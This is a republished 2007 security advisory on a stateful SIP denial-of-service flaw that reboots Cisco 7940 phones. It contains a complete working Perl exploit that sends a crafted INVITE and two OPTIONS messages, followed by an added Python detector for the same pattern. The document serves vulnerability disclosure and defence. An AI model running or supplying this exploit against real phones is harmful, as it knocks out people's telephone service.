3 messages attack: remote DoS on Cisco 7940

2007.08.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

MADYNES Security Advisory: stateful SIP remote DoS on Cisco 7940

Date of Discovery: 3 February, 2007
ID: KIPH5

Synopsis

After receiving a series of three SIP messages the device reboots. The phone does not properly check the state engine in its SIP stack. The vendor was informed in March 2007 and acknowledged the vulnerability.

This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first published vulnerabilities for which advanced state tracking is required.

Background

* SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalling. SIP is an ASCII-based protocol; the INVITE message is used to initiate and maintain a communication session.

Affected devices: Cisco phone 7940 (possibly others as well) running firmware P0S3-08-6-00

Impact

A malicious user can remotely crash the device and perform a denial of service attack by sending three crafted SIP messages.

Resolution

Fixed software will be available from the vendor. Customers following recommended best practices (i.e. segregating VoIP traffic from data traffic) will be protected from malicious traffic in most situations.

Credits

* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)

Configuration of our device:

* Current Firmware: P0S3-08-6-00
* IP-Address obtained by DHCP as 192.168.1.8
* User Name: 7940-1

Vulnerability:

The issue is based on a sequence of messages: none of the individual messages does any harm by itself, but together they put the device in an inconsistent state. The sequence is:

X ------------------------- INVITE -----------------------> Cisco
X <--- 481 transaction does not exist ------ Cisco
X ------------------------- OPTIONS --------------------> Cisco
X <--------------------------- OK ------------------------- Cisco
X <--- 481 transaction does not exist ------ Cisco
X ------------------------- OPTIONS --------------------> Cisco

And the device reboots.

The INVITE sent has the particularity that the remote tag is already filled in. The following two OPTIONS messages must have the same Call-ID as the INVITE and the CSeq number must increment, otherwise the test does not work.

Exploit:

To run the exploit, the file stateful-cisco-8.6.pl should be launched (assuming our configuration) as:

perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1

The script is simple and does not check which messages are received; it just waits a second before sending the next one.

#!/usr/bin/perl
# stateful-cisco-8.6.pl: sends the three-message sequence described above
# to <dst>:<port> for user <username>.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

# UDP socket towards the phone's SIP port
my $socket = IO::Socket::INET->new(PeerPort => $ARGV[1], Proto => 'udp', PeerAddr => $ARGV[0])
    or die "cannot create socket: $!";

# 1. INVITE with the remote (To) tag already filled in
my $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=00\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);

# 2. OPTIONS with the same Call-ID and an incremented CSeq
$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=01\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);

# 3. Second OPTIONS, same Call-ID, CSeq incremented again
$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=02\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
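As an added example (not part of the advisory or of the KIPH tool), a small Python check that a SIP-aware monitor or IDS could run over captured requests to flag the pattern described above: an out-of-dialog INVITE whose To header already carries a tag, followed by requests that reuse its Call-ID with an incrementing CSeq. The parser and the sample messages below are constructed for this illustration.

```python
import re

# Constructed sample traffic reproducing the advisory's three-message sequence
# (Call-ID reused, CSeq incrementing, INVITE with a pre-filled To tag).
SAMPLE = [
    "INVITE sip:7940-1@192.168.1.8 SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\n"
    "From: <sip:a@192.168.1.2>;tag=00\r\nTo: <sip:7940-1@192.168.1.8>;tag=00\r\n"
    "Call-ID: et@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n",
    "OPTIONS sip:7940-1@192.168.1.8 SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=01\r\n"
    "From: <sip:a@192.168.1.2>;tag=01\r\nTo: <sip:7940-1@192.168.1.8>\r\n"
    "Call-ID: et@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n",
    "OPTIONS sip:7940-1@192.168.1.8 SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=02\r\n"
    "From: <sip:a@192.168.1.2>;tag=02\r\nTo: <sip:7940-1@192.168.1.8>\r\n"
    "Call-ID: et@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n",
]

def parse_request(raw):
    """Return (method, headers) for one SIP request; header names lower-cased."""
    lines = raw.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header section
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers

def detect_stateful_sequence(messages):
    """Flag the advisory's pattern: an INVITE whose To header already carries
    a tag (although no dialog exists yet), followed by non-INVITE requests that
    reuse its Call-ID with a higher CSeq. Returns a list of (index, reason)."""
    watched = {}  # Call-ID -> last CSeq seen on a suspicious dialog
    alerts = []
    for i, raw in enumerate(messages):
        method, h = parse_request(raw)
        call_id = h.get("call-id", "")
        cseq = int(h.get("cseq", "0 NONE").split()[0])
        if method == "INVITE" and re.search(r";\s*tag=", h.get("to", "")):
            alerts.append((i, "INVITE with pre-filled To tag"))
            watched[call_id] = cseq
        elif method != "INVITE" and call_id in watched and cseq > watched[call_id]:
            watched[call_id] = cseq
            alerts.append((i, f"{method} reuses Call-ID {call_id} with CSeq {cseq}"))
    return alerts
```

Run over SAMPLE this yields three alerts, one per message; the same OPTIONS requests without the tagged INVITE before them produce none.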


Copyright 2020, cxsecurity.com
